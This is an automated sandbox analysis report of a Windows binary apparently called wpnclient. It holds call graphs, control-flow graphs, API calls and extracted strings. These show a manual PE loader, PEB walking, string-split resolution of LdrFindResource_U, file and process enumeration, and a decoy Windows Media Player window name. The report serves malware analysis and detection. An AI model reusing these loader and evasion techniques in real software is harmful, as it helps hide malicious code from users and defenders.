13033->13032 13034 21e40f0 GetPEB 13033->13034 13035 21e35f0 13033->13035 13034->13033 13036 21e3613 13035->13036 13037 21e3638 13036->13037 13038 21e4190 GetPEB 13036->13038 13041 21e4190 GetPEB 13037->13041 13044 21e3660 13037->13044 13039 21e362c 13038->13039 13040 21e40f0 GetPEB 13039->13040 13040->13037 13042 21e3654 13041->13042 13043 21e40f0 GetPEB 13042->13043 13043->13044 13044->13033 13045 590000 13047 590005 13045->13047 13050 59002d 13047->13050 13070 590456 GetPEB 13050->13070 13053 590456 GetPEB 13054 590053 13053->13054 13055 590456 GetPEB 13054->13055 13056 590061 13055->13056 13057 590456 GetPEB 13056->13057 13058 59006d 13057->13058 13059 590456 GetPEB 13058->13059 13060 59007b 13059->13060 13061 590456 GetPEB 13060->13061 13063 590089 13061->13063 13062 5900e4 GetNativeSystemInfo 13064 590107 VirtualAlloc 13062->13064 13068 590029 13062->13068 13063->13062 13063->13068 13066 59012f 13064->13066 13065 5903b2 13072 21827b0 13065->13072 13066->13065 13067 590388 VirtualProtect 13066->13067 13067->13066 13067->13068 13071 590045 13070->13071 13071->13053 13075 2181000 13072->13075 13078 2181030 LoadLibraryW GetProcAddress 13075->13078 13119 2181b30 13078->13119 13081 2181091 SetLastError 13115 218102b ExitProcess 13081->13115 13082 21810a3 13083 2181b30 SetLastError 13082->13083 13084 21810b9 13083->13084 13085 21810de SetLastError 13084->13085 13086 21810f0 13084->13086 13084->13115 13085->13115 13087 21810ff SetLastError 13086->13087 13088 2181111 13086->13088 13087->13115 13089 218111c SetLastError 13088->13089 13091 218112e GetNativeSystemInfo 13088->13091 13089->13115 13092 21811bc 13091->13092 13093 21811e9 13092->13093 13094 21811d7 SetLastError 13092->13094 13122 2181800 VirtualAlloc 13093->13122 13094->13115 13095 2181202 13096 218123d GetProcessHeap RtlAllocateHeap 13095->13096 13123 2181800 VirtualAlloc 13095->13123 13097 218127b 13096->13097 13098 2181257 SetLastError 13096->13098 13102 2181b30 SetLastError 13097->13102 13098->13115 13099 2181222 13099->13096 13100 218122e SetLastError 13099->13100 13100->13115 13103 21812fb 13102->13103 13104 2181302 13103->13104 13124 2181800 VirtualAlloc 13103->13124 13150 21816c0 13104->13150 13105 2181320 13125 2181b50 13105->13125 13108 218136b 13108->13104 13131 21821a0 13108->13131 13112 21813ca 13112->13104 13113 21813eb 13112->13113 13114 21813ff GetPEB 13113->13114 13113->13115 13114->13115 13120 2181b3b SetLastError 13119->13120 13121 2181070 13119->13121 13120->13121 13121->13081 13121->13082 13121->13115 13122->13095 13123->13099 13124->13105 13129 2181b7d 13125->13129 13126 2181b30 SetLastError 13127 2181c32 13126->13127 13128 2181be9 13127->13128 13158 2181800 VirtualAlloc 13127->13158 13128->13108 13129->13126 13129->13128 13132 21821dd IsBadReadPtr 13131->13132 13133 21813b5 13131->13133 13132->13133 13135 2182207 13132->13135 13133->13104 13144 2181e80 13133->13144 13135->13133 13136 2182239 SetLastError 13135->13136 13137 218224d 13135->13137 13136->13133 13159 2181a20 13137->13159 13140 2182273 SetLastError 13140->13133 13142 21823ae SetLastError 13142->13133 13143 218229d 13143->13133 13143->13142 13147 2181eba 13144->13147 13145 2181fe5 13146 2181d10 2 API calls 13145->13146 13149 2181fc1 13146->13149 13147->13145 13147->13149 13174 2181d10 13147->13174 13149->13112 13151 21816d2 13150->13151 13152 21816d7 13150->13152 13151->13115 13153 21819d0 VirtualFree 13152->13153 13156 218170b 13153->13156 13154 2181770 GetProcessHeap HeapFree 13154->13151 13156->13154 13157 21819d0 VirtualFree 13156->13157 13157->13154 13158->13128 13160 2181a2c 13159->13160 13163 2181a35 13159->13163 13167 2181900 13160->13167 13166 2181a43 13163->13166 13170 21819f0 VirtualAlloc 13163->13170 13164 2181a51 13164->13166 13171 21819d0 13164->13171 13166->13140 13166->13143 13168 218190c 13167->13168 13169 2181910 VirtualQuery 13167->13169 13168->13163 13169->13168 13170->13164 13172 21819d9 VirtualFree 13171->13172 13173 21819ea 13171->13173 13172->13173 13173->13166 13175 2181d29 13174->13175 13179 2181d1f 13174->13179 13176 2181d37 13175->13176 13177 2181d9d VirtualProtect 13175->13177 13176->13179 13181 2181820 VirtualFree 13176->13181 13177->13179 13179->13147 13181->13179 13413 21e9b40 13416 21e9b60 13413->13416 13414 21e9e3b 13417 21e4190 GetPEB 13414->13417 13420 21e9e5a 13414->13420 13415 21e9c54 13416->13414 13416->13415 13418 21e4190 GetPEB 13416->13418 13422 21e40f0 GetPEB 13416->13422 13425 21e7ee0 13416->13425 13421 21e9e4e 13417->13421 13418->13416 13435 21e3190 13420->13435 13424 21e40f0 GetPEB 13421->13424 13422->13416 13424->13420 13434 21e7f00 13425->13434 13426 21e8089 13427 21e80a9 13426->13427 13429 21e4190 GetPEB 13426->13429 13427->13416 13428 21e804c 13428->13416 13431 21e809d 13429->13431 13430 21e4190 GetPEB 13430->13434 13432 21e40f0 GetPEB 13431->13432 13432->13427 13433 21e40f0 GetPEB 13433->13434 13434->13426 13434->13428 13434->13430 13434->13433 13436 21e31a0 13435->13436 13438 21e31b5 13436->13438 13440 21e3a20 13436->13440 13438->13415 13439 21e31e0 13439->13415 13450 21e3a40 13440->13450 13441 21e3ca0 13444 21e3cc4 FindClose 13441->13444 13446 21e4190 GetPEB 13441->13446 13442 21e3bb3 FindNextFileW 13442->13450 13443 21e3bf1 13443->13439 13447 21e3cc7 13444->13447 13445 21e3b6b FindFirstFileW 13445->13447 13445->13450 13448 21e3cb3 13446->13448 13447->13439 13451 21e40f0 GetPEB 13448->13451 13449 21e40f0 GetPEB 13449->13450 13450->13441 13450->13442 13450->13443 13450->13445 13450->13449 13453 21e35f0 GetPEB 13450->13453 13454 21e4190 GetPEB 13450->13454 13455 21e3a20 GetPEB 13450->13455 13457 21e3590 13450->13457 13452 21e3cbf 13451->13452 13452->13444 13453->13450 13454->13450 13455->13450 13458 21e359d 13457->13458 13459 21e35b3 13457->13459 13460 21e4190 GetPEB 13458->13460 13463 21e35db 13459->13463 13464 21e4190 GetPEB 13459->13464 13461 21e35a7 13460->13461 13462 21e40f0 GetPEB 13461->13462 13462->13459 13463->13450 13465 21e35cf 13464->13465 13466 21e40f0 GetPEB 13465->13466 13466->13463 13494 21e18c0 13495 21e18cc 13494->13495 13499 21e18e2 13494->13499 13496 21e4190 GetPEB 13495->13496 13497 21e18d6 13496->13497 13498 21e40f0 GetPEB 13497->13498 13498->13499 13500 21e4190 GetPEB 13499->13500 13504 21e190b 13499->13504 13501 21e18ff 13500->13501 13503 21e40f0 GetPEB 13501->13503 13502 21e196e 13503->13504 13504->13502 13504->13504 13509 21e2680 13504->13509 13507 21e195c 13508 21e4570 GetPEB 13508->13502 13511 21e2690 13509->13511 13510 21e28a5 CryptDecodeObjectEx 13510->13511 13511->13510 13512 21e2a15 13511->13512 13514 21e4190 GetPEB 13511->13514 13515 21e40f0 GetPEB 13511->13515 13516 21e1958 13511->13516 13513 21e4570 GetPEB 13512->13513 13513->13516 13514->13511 13515->13511 13516->13507 13516->13508 13517 21e31f0 13523 21e320a 13517->13523 13518 21e33e3 13522 21e4190 GetPEB 13518->13522 13526 21e323d 13518->13526 13519 21e33c9 RtlAllocateHeap 13519->13523 13519->13526 13520 21e40f0 GetPEB 13520->13523 13521 21e4190 GetPEB 13521->13523 13524 21e33f7 13522->13524 13523->13518 13523->13519 13523->13520 13523->13521 13523->13526 13525 21e40f0 GetPEB 13524->13525 13525->13526 12990 21e4fe8 13003 21e4ff0 12990->13003 12991 21e5107 12994 21e512b CloseHandle 12991->12994 13004 21e4190 GetPEB 12991->13004 12992 21e50f0 CreateToolhelp32Snapshot 12993 21e512e 12992->12993 12992->13003 12994->12993 12995 21e50c2 12996 21e503e Process32FirstW 12996->13003 12998 21e40f0 GetPEB 12998->13003 13001 21e4190 GetPEB 13001->13003 13002 21e5126 13002->12994 13003->12991 13003->12992 13003->12995 13003->12996 13003->12998 13003->13001 13005 21e41b5 13004->13005 13006 21e40f0 13005->13006 13007 21e414c 13006->13007 13009 21e412c 13006->13009 13007->13002 13008 21e4184 13008->13002 13009->13007 13009->13008 13010 21e4190 GetPEB 13009->13010 13013 21e4445 13009->13013 13011 21e4439 13010->13011 13012 21e40f0 GetPEB 13011->13012 13012->13013 13014 21e4190 GetPEB 13013->13014 13020 21e4476 13013->13020 13016 21e446a 13014->13016 13015 21e40f0 GetPEB 13018 21e44a7 13015->13018 13019 21e40f0 GetPEB 13016->13019 13017 21e4488 13017->13002 13018->13002 13019->13020 13020->13015 13020->13017 13467 21e6360 13482 21e5850 13467->13482 13469 21e6374 13470 21e63a2 13469->13470 13471 21e4190 GetPEB 13469->13471 13472 21e642b 13469->13472 13474 21e40f0 GetPEB 13469->13474 13471->13469 13473 21e36f0 GetPEB 13472->13473 13475 21e6436 13473->13475 13474->13469 13476 21e6457 13475->13476 13477 21e4190 GetPEB 13475->13477 13479 21e3590 GetPEB 13476->13479 13478 21e644b 13477->13478 13480 21e40f0 GetPEB 13478->13480 13481 21e6479 13479->13481 13480->13476 13483 21e5866 13482->13483 13488 21e587c 13482->13488 13484 21e4190 GetPEB 13483->13484 13485 21e5870 13484->13485 13486 21e40f0 GetPEB 13485->13486 13486->13488 13487 21e58f3 13487->13469 13488->13487 13489 21e58db GetVolumeInformationW 13488->13489 13490 21e4190 GetPEB 13488->13490 13489->13487 13491 21e58ca 13490->13491 13492 21e40f0 GetPEB 13491->13492 13493 21e58d6 13492->13493 13493->13489

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 401600-40162e LoadLibraryA GetProcAddress EncryptFileA 1 401630-40163c 0->1 2 40163f-40185c ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z * 2 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z LoadLibraryA GetProcAddress * 2 LdrFindResource_U 0->2 3 401878-4018c1 VirtualAlloc call 40100a call 401019 2->3 4 40185e-401872 LdrAccessResource 2->4 8 4018c6-4018db 3->8 4->3 10 4018e1-40195c LoadIconA LoadCursorA GetStockObject RegisterClassA 8->10 11 4019d3-401a3a CreateWindowExA ShowWindow UpdateWindow GetMessageA 8->11 10->11 12 40195e-4019d0 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z * 8 10->12 13 401a3c-401a42 11->13 14 401a6d-401a89 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z 11->14 17 401a48-401a6b TranslateMessage DispatchMessageA GetMessageA 13->17 15 401aa7-401ab9 14->15 16 401a8b-401a90 14->16 20 401ad7-401ae9 15->20 21 401abb-401ac0 15->21 18 401a92-401a94 16->18 19 401a9d-401aa4 ??3@YAXPAX@Z 16->19 17->14 17->17 18->19 22 401a96-401a9b 18->22 19->15 25 401b07-401b19 20->25 26 401aeb-401af0 20->26 23 401ac2-401ac4 21->23 24 401acd-401ad4 ??3@YAXPAX@Z 21->24 22->15 23->24 29 401ac6-401acb 23->29 24->20 27 401b37-401b49 25->27 28 401b1b-401b20 25->28 30 401af2-401af4 26->30 31 401afd-401b04 ??3@YAXPAX@Z 26->31 34 401b67-401b79 27->34 35 401b4b-401b50 27->35 32 401b22-401b24 28->32 33 401b2d-401b34 ??3@YAXPAX@Z 28->33 29->20 30->31 36 401af6-401afb 30->36 31->25 32->33 37 401b26-401b2b 32->37 33->27 40 401b97-401bac 34->40 41 401b7b-401b80 34->41 38 401b52-401b54 35->38 39 401b5d-401b64 ??3@YAXPAX@Z 35->39 36->25 37->27 38->39 42 401b56-401b5b 38->42 39->34 45 401bd7-401be3 40->45 46 401bae-401bb3 40->46 43 401b82-401b84 41->43 44 401b8d-401b94 ??3@YAXPAX@Z 41->44 42->34 43->44 49 401b86-401b8b 43->49 44->40 47 401bb5-401bb7 46->47 48 401bcd-401bd4 ??3@YAXPAX@Z 46->48 47->48 50 401bb9-401bca 47->50 48->45 49->40
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(Advapi32.dll,EncryptFileA), ref: 0040161A
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401623
                                                                                      • EncryptFileA.ADVAPI32(C:\Windows\Setup\State\State.ini), ref: 0040162A
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60 ref: 0040167D
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(LdrFin), ref: 0040169F
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 004016B2
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(dReso), ref: 004016D1
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 004016E4
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(urce_U), ref: 00401703
                                                                                      • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,?,?), ref: 00401723
                                                                                      • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401731
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00401742
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401755
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(Ldr), ref: 00401774
                                                                                      • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401787
                                                                                      • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(Acces), ref: 004017A6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541432357.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2541409691.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541456929.0000000000405000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2541479704.0000000000474000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$Tidy@?$basic_string@$?assign@?$basic_string@V12@$D@2@@0@Hstd@@V10@0@V?$basic_string@$AddressEncryptFileLibraryLoadProc
                                                                                      • String ID: Acces$Advapi32.dll$C:\Windows\Setup\State\State.ini$EncryptFileA$GIh@36E#YEA1tFmFqw44wMs%bm^9R?qzDkkk^Ht+tywp2T&M8aVQ1wu#c<eCQglgS+m&KyvZQb_x!tLZTbzSj4!?m$5vwsutammbhRsGHUifpf$Ldr$LdrAccessResource$LdrFin$LdrFindResource_U$WMPlayerWindowEditor$Windows Media Player HWND Editor$dReso$ntdll.dll$sResource$urce_U
                                                                                      • API String ID: 3516244591-712066751
                                                                                      • Opcode ID: f8c8bf3419da7efc3c2f758ebdd38b7438056af9a9bfe9611bd3ddaf80b0cfcc
                                                                                      • Instruction ID: dce9f58f7b180b880584391d3317b87618375bb0fe771e7de301abb772954e00
                                                                                      • Opcode Fuzzy Hash: f8c8bf3419da7efc3c2f758ebdd38b7438056af9a9bfe9611bd3ddaf80b0cfcc
                                                                                      • Instruction Fuzzy Hash: FDF1E4711183809FD324DF60CC49BAFBBA4EB84310F40493EF586632D1EBB99909CB5A

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 207 2181030-2181075 LoadLibraryW GetProcAddress call 2181b30 210 218107e-218108f 207->210 211 2181077-2181079 207->211 213 2181091-218109e SetLastError 210->213 214 21810a3-21810be call 2181b30 210->214 212 218148d-2181490 211->212 213->212 217 21810c0-21810c2 214->217 218 21810c7-21810dc 214->218 217->212 219 21810de-21810eb SetLastError 218->219 220 21810f0-21810fd 218->220 219->212 221 21810ff-218110c SetLastError 220->221 222 2181111-218111a 220->222 221->212 223 218111c-2181129 SetLastError 222->223 224 218112e-218114f 222->224 223->212 225 2181163-218116d 224->225 226 218116f-2181176 225->226 227 21811a5-21811d5 GetNativeSystemInfo call 21818d0 * 2 225->227 228 2181178-2181184 226->228 229 2181186-2181192 226->229 238 21811e9-218120c call 2181800 227->238 239 21811d7-21811e4 SetLastError 227->239 231 2181195-218119b 228->231 229->231 233 218119d-21811a0 231->233 234 21811a3 231->234 233->234 234->225 241 218123d-2181255 GetProcessHeap RtlAllocateHeap 238->241 242 218120e-218121f call 2181800 238->242 239->212 243 218127b-2181291 241->243 244 2181257-2181276 SetLastError 241->244 245 2181222-218122c 242->245 246 218129c 243->246 247 2181293-218129a 243->247 244->212 245->241 248 218122e-2181238 SetLastError 245->248 250 21812a3-2181300 call 2181b30 246->250 247->250 248->212 253 2181302 250->253 254 2181307-2181370 call 2181800 call 2181980 call 2181b50 250->254 255 218147f-218148b call 21816c0 253->255 263 2181372 254->263 264 2181377-2181388 254->264 255->212 263->255 265 218138a-21813a0 call 2182090 264->265 266 21813a2-21813a5 264->266 268 21813ac-21813ba call 21821a0 265->268 266->268 272 21813bc 268->272 273 21813c1-21813c5 call 2181e80 268->273 272->255 275 21813ca-21813cf 273->275 276 21813d1 275->276 277 21813d6-21813e4 call 2182010 275->277 276->255 280 21813eb-21813f4 277->280 281 21813e6 277->281 282 2181470-2181473 280->282 283 21813f6-21813fd 280->283 281->255 284 218147a-218147d 282->284 285 218145d-218146b 283->285 286 21813ff-218145b GetPEB 283->286 284->212 287 218146e 285->287 286->287 287->284
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(02184054,02184040), ref: 02181047
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0218104E
                                                                                        • Part of subcall function 02181B30: SetLastError.KERNEL32(0000000D,?,02181070,?,00000040), ref: 02181B3D
                                                                                      • SetLastError.KERNEL32(000000C1), ref: 02181096
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2541930678.0000000002181000.00000020.00001000.00020000.00000000.sdmp, Offset: 02181000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2181000_wpnclient.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                      • String ID:
                                                                                      • API String ID: 1866314245-0
                                                                                      • Opcode ID: dcb111a544bbcc80dde65501c748eca218fb5c1b56776e604ffbccee93838c02
                                                                                      • Instruction ID: 3e3d0a417fc0c1b8ea8fa4eba270c9e9a2c36b43b1d6aae6b46de56683157e40
                                                                                      • Opcode Fuzzy Hash: dcb111a544bbcc80dde65501c748eca218fb5c1b56776e604ffbccee93838c02
                                                                                      • Instruction Fuzzy Hash: C0F1E9B5E40209EFDB04DF94D984BAEB7B1BF48304F208598E919AB341D735EA52CF90

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 292 21e3a20-21e3a3b 293 21e3a40-21e3a45 292->293 294 21e3bce-21e3bd3 293->294 295 21e3a4b 293->295 298 21e3bfc-21e3c0f call 21e35f0 294->298 299 21e3bd5-21e3bda 294->299 296 21e3b8f-21e3b96 295->296 297 21e3a51-21e3a56 295->297 305 21e3b98-21e3bae call 21e4190 call 21e40f0 296->305 306 21e3bb3-21e3bc9 FindNextFileW 296->306 302 21e3a5c-21e3a61 297->302 303 21e3ca0-21e3ca7 297->303 319 21e3c2c-21e3c47 298->319 320 21e3c11-21e3c27 call 21e4190 call 21e40f0 298->320 300 21e3bdc-21e3be1 299->300 301 21e3be6-21e3beb 299->301 300->293 301->293 307 21e3bf1-21e3bfb 301->307 308 21e3b47-21e3b4e 302->308 309 21e3a67-21e3a6c 302->309 312 21e3ca9-21e3cbf call 21e4190 call 21e40f0 303->312 313 21e3cc4-21e3cc5 FindClose 303->313 305->306 306->293 314 21e3b6b-21e3b7f FindFirstFileW 308->314 315 21e3b50-21e3b66 call 21e4190 call 21e40f0 308->315 309->301 318 21e3a72-21e3a77 309->318 312->313 317 21e3cc7-21e3cd1 313->317 314->317 324 21e3b85-21e3b8a 314->324 315->314 325 21e3a7d-21e3a83 318->325 326 21e3b21-21e3b42 318->326 343 21e3c49-21e3c5f call 21e4190 call 21e40f0 319->343 344 21e3c64-21e3c6f 319->344 320->319 324->293 331 21e3aa4-21e3aa6 325->331 332 21e3a85-21e3a8d 325->332 326->293 339 21e3a9d-21e3aa2 331->339 341 21e3aa8-21e3abb call 21e35f0 331->341 338 21e3a8f-21e3a93 332->338 332->339 338->331 346 21e3a95-21e3a9b 338->346 339->293 353 21e3abd-21e3ad3 call 21e4190 call 21e40f0 341->353 354 21e3ad8-21e3b08 call 21e3a20 341->354 343->344 356 21e3c8c-21e3c9b 344->356 357 21e3c71-21e3c87 call 21e4190 call 21e40f0 344->357 346->331 346->339 353->354 369 21e3b0d-21e3b1c call 21e3590 354->369 356->293 357->356 369->293
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 021E3B78
                                                                                      • FindNextFileW.KERNELBASE(?,?), ref: 021E3BB9
                                                                                      • FindClose.KERNELBASE(?), ref: 021E3CC5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID: .$HUE($HUE($12
                                                                                      • API String ID: 3541575487-884143723
                                                                                      • Opcode ID: 6926cca61d7fa12fbd994a60c5f49db8fc469c74c8b30cd2dbe281bf68e71a78
                                                                                      • Instruction ID: 0fecd261d3f842c200cfc79b3455d43b7b34063b7525a58c3b64cfdbdb4f42a1
                                                                                      • Opcode Fuzzy Hash: 6926cca61d7fa12fbd994a60c5f49db8fc469c74c8b30cd2dbe281bf68e71a78
                                                                                      • Instruction Fuzzy Hash: B751F831BC4A048BCE24EBB8AC4477F76D69BD0610F0109ADE567CB240EB35C8918B92

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 373 21e2680-21e268c 374 21e2690-21e2696 373->374 375 21e269c 374->375 376 21e28db-21e28e1 374->376 379 21e26a2-21e26a8 375->379 380 21e2881-21e2888 375->380 377 21e29c6-21e29cc 376->377 378 21e28e7 376->378 383 21e27ec-21e27f2 377->383 384 21e29d2-21e29d9 377->384 385 21e28ed-21e28f3 378->385 386 21e2975-21e297d 378->386 381 21e26ae 379->381 382 21e27d8-21e27de 379->382 387 21e288a-21e28a0 call 21e4190 call 21e40f0 380->387 388 21e28a5-21e28d6 CryptDecodeObjectEx 380->388 389 21e276e-21e2775 381->389 390 21e26b4-21e26ba 381->390 395 21e2800-21e2808 382->395 396 21e27e0-21e27e6 382->396 383->374 397 21e27f8-21e27ff 383->397 391 21e29db-21e29f1 call 21e4190 call 21e40f0 384->391 392 21e29f6-21e2a05 384->392 393 21e293c-21e2943 385->393 394 21e28f5-21e28fb 385->394 398 21e297f-21e2997 call 21e4190 call 21e40f0 386->398 399 21e299d-21e29aa 386->399 387->388 388->374 407 21e2777-21e278d call 21e4190 call 21e40f0 389->407 408 21e2792-21e279d 389->408 402 21e26bc-21e26c2 390->402 403 21e2719-21e2721 390->403 391->392 392->374 404 21e2945-21e295b call 21e4190 call 21e40f0 393->404 405 21e2960-21e2970 393->405 394->383 409 21e2901-21e2908 394->409 412 21e280a-21e2822 call 21e4190 call 21e40f0 395->412 413 21e2828-21e283d 395->413 396->383 410 21e2a15-21e2a1b call 21e4570 396->410 398->399 418 21e29af-21e29c1 399->418 402->383 419 21e26c8-21e26d0 402->419 424 21e2723-21e273b call 21e4190 call 21e40f0 403->424 425 21e2741-21e2754 403->425 404->405 405->374 407->408 450 21e279f-21e27b5 call 21e4190 call 21e40f0 408->450 451 21e27ba-21e27c8 408->451 421 21e290a-21e2920 call 21e4190 call 21e40f0 409->421 422 21e2925-21e2937 409->422 428 21e2a20-21e2a27 410->428 412->413 430 21e2842-21e2859 413->430 418->374 436 21e26d2-21e26ea call 21e4190 call 21e40f0 419->436 437 21e26f0-21e2702 419->437 421->422 422->374 424->425 448 21e2757-21e2769 425->448 446 21e285b-21e2871 call 21e4190 call 21e40f0 430->446 447 21e2876-21e287c 430->447 436->437 463 21e2707-21e2709 437->463 446->447 447->383 448->374 450->451 451->428 476 21e27ce-21e27d3 451->476 471 21e270f-21e2714 463->471 472 21e2a0a-21e2a14 463->472 471->374 476->374
                                                                                      APIs
                                                                                      • CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?), ref: 021E28C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.2542043862.00000000021E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                                                                      • Associated: 00000004.00000002.2542028563.00000000021E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542064560.00000000021ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.00000000021F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.2542080177.0000000002233000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_21e0000_wpnclient.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CryptDecodeObject
                                                                                      • String ID: U3"$U3"$p^sw$12
                                                                                      • API String ID: 1207547050-1249047765
                                                                                      • Opcode ID: 38e92e2958caddf68c3d21f677b68793719cc1094ab2ab47b376ce2161fe8c9d
                                                                                      • Instruction ID: 5f3bafbf076d084b618a3c4952a4e69b53e01f5461fcada24fa595319bc05fcd
                                                                                      • Opcode Fuzzy Hash: 38e92e2958caddf68c3d21f677b68793719cc1094ab2ab47b376ce2161fe8c9d
                                                                                      • Instruction Fuzzy Hash: 5981F435FC06119BDF18AEA8AC60B6A23DA6B94300F05483DDD179F280EB719C948BD1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
